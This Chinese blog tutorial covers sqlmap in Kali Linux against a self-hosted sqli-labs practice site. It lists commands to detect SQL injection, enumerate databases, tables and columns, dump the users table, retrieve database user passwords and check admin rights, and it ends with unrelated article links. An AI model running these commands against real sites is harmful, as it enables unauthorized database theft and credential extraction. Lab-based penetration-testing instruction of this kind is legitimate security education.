kali——sqlmap的使用

2024-08-30 01:44
文章标签 使用 kali sqlmap

本文主要是介绍kali——sqlmap的使用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

前言

sqlmap在kali中的使用

检测注入点

产看所有数据库

查看当前网站使用的数据库

产看数据表

查看字段

查看字段数据

查看数据库用户

查看所有用户

获取数据库用户密码

查看用户权限

判断当前数据库用户是否是管理员

批量自动化扫描

post请求注入

cookie注入



前言

sqlmap是一款强大的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,协助渗透测试人员快速发现和验证web应用程序中的SQL注入缺陷。

实际渗透测试中,只要kali机能够上网就可以直接使用sqlmap;这里我们在centos上搭建sqlibs靶场做靶机,kali机为攻击机。

然后将kali机的dns为服务机centos的dns,这样kali机就可以访问centos上的网站了。


sqlmap在kali中的使用

检测注入点

sqlmap -u 完整url             //检测过程中需要手动输入y/n,即是否继续进行sql注入检测
sqlmap -u 完整url --batch     //检测过程中默认继续进行sql注入检测

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --batch

可以看到一共扫到了四种类型的sql注入漏洞,以及漏洞使用方法:


产看所有数据库

sqlmap -u 完整url --dbs

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --dbs


查看当前网站使用的数据库

sqlmap -u 完整url --current-db

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --current-db

可以看到使用的数据库是security


产看数据表

sqlmap -u 完整url -D '数据库名' --tables

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' --tables

可以看到数据库security有四张表:emails、referers、uagents、users


查看字段

sqlmap -u 完整url -D '数据库名' -T '表名' --columns

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --columns

可以看到users表有三个字段:id、password、username


查看字段数据

sqlmap -u 完整url -D '数据库名' -T '表名' --dump

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --dump

可以看到users表的三个字段及其数据


查看数据库用户

sqlmap -u 完整url --current-user

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --current-user


查看所有用户

sqlmap -u 完整url --users

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --users


获取数据库用户密码

sqlmap -u 完整url --passwords

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --passwords


查看用户权限

sqlmap -u 完整url --privileges

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --privileges


判断当前数据库用户是否是管理员

sqlmap -u 完整url --is-dba

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --is-dba

判断结果为True,即当前数据库用户是管理员用户。


批量自动化扫描

新建xxx.txt文件,里面存放多个url

sqlmap -m xxx.txt

post请求注入

将抓包抓到的http请求内容存放到.txt文件中

sqlmap -r xxx.txt

cookie注入

sqlmap -u 完整curl --cookie 'cookie'(单引号和双引号都行)


这篇关于kali——sqlmap的使用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1119444

相关文章

一文详解如何使用Java获取PDF页面信息

《一文详解如何使用Java获取PDF页面信息》了解PDF页面属性是我们在处理文档、内容提取、打印设置或页面重组等任务时不可或缺的一环,下面我们就来看看如何使用Java语言获取这些信息吧... 目录引言一、安装和引入PDF处理库引入依赖二、获取 PDF 页数三、获取页面尺寸(宽高)四、获取页面旋转角度五、判断

C++中assign函数的使用

《C++中assign函数的使用》在C++标准模板库中,std::list等容器都提供了assign成员函数,它比操作符更灵活,支持多种初始化方式,下面就来介绍一下assign的用法,具有一定的参考价... 目录​1.assign的基本功能​​语法​2. 具体用法示例​​​(1) 填充n个相同值​​(2)

Spring StateMachine实现状态机使用示例详解

《SpringStateMachine实现状态机使用示例详解》本文介绍SpringStateMachine实现状态机的步骤,包括依赖导入、枚举定义、状态转移规则配置、上下文管理及服务调用示例,重点解... 目录什么是状态机使用示例什么是状态机状态机是计算机科学中的​​核心建模工具​​,用于描述对象在其生命

使用Python删除Excel中的行列和单元格示例详解

《使用Python删除Excel中的行列和单元格示例详解》在处理Excel数据时,删除不需要的行、列或单元格是一项常见且必要的操作,本文将使用Python脚本实现对Excel表格的高效自动化处理,感兴... 目录开发环境准备使用 python 删除 Excphpel 表格中的行删除特定行删除空白行删除含指定

深入理解Go语言中二维切片的使用

《深入理解Go语言中二维切片的使用》本文深入讲解了Go语言中二维切片的概念与应用,用于表示矩阵、表格等二维数据结构,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧... 目录引言二维切片的基本概念定义创建二维切片二维切片的操作访问元素修改元素遍历二维切片二维切片的动态调整追加行动态

prometheus如何使用pushgateway监控网路丢包

《prometheus如何使用pushgateway监控网路丢包》:本文主要介绍prometheus如何使用pushgateway监控网路丢包问题,具有很好的参考价值,希望对大家有所帮助,如有错误... 目录监控网路丢包脚本数据图表总结监控网路丢包脚本[root@gtcq-gt-monitor-prome

Python通用唯一标识符模块uuid使用案例详解

《Python通用唯一标识符模块uuid使用案例详解》Pythonuuid模块用于生成128位全局唯一标识符,支持UUID1-5版本,适用于分布式系统、数据库主键等场景,需注意隐私、碰撞概率及存储优... 目录简介核心功能1. UUID版本2. UUID属性3. 命名空间使用场景1. 生成唯一标识符2. 数

SpringBoot中如何使用Assert进行断言校验

《SpringBoot中如何使用Assert进行断言校验》Java提供了内置的assert机制,而Spring框架也提供了更强大的Assert工具类来帮助开发者进行参数校验和状态检查,下... 目录前言一、Java 原生assert简介1.1 使用方式1.2 示例代码1.3 优缺点分析二、Spring Fr

Android kotlin中 Channel 和 Flow 的区别和选择使用场景分析

《Androidkotlin中Channel和Flow的区别和选择使用场景分析》Kotlin协程中,Flow是冷数据流,按需触发,适合响应式数据处理;Channel是热数据流,持续发送,支持... 目录一、基本概念界定FlowChannel二、核心特性对比数据生产触发条件生产与消费的关系背压处理机制生命周期

java使用protobuf-maven-plugin的插件编译proto文件详解

《java使用protobuf-maven-plugin的插件编译proto文件详解》:本文主要介绍java使用protobuf-maven-plugin的插件编译proto文件,具有很好的参考价... 目录protobuf文件作为数据传输和存储的协议主要介绍在Java使用maven编译proto文件的插件